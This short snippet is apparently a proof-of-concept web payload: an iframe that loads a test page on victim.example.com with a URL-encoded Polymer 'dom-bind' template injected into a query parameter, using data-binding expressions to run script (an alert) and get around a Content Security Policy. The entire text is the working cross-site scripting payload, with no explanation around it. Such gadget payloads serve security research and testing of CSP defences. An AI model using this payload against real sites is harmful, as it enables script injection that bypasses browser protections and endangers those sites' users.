<iframe src="https://victim.example.com/repo/csp/sd/polymer.php?csp=wh&inj=<?php 
$payload = <<<PAYLOAD
<template is=dom-bind><div
c={{alert('1337',ownerDocument.defaultView)}}
b={{set('_rootDataHost',ownerDocument.defaultView)}}
>
</div></template>
PAYLOAD;
echo urlencode($payload);
?>"></iframe>
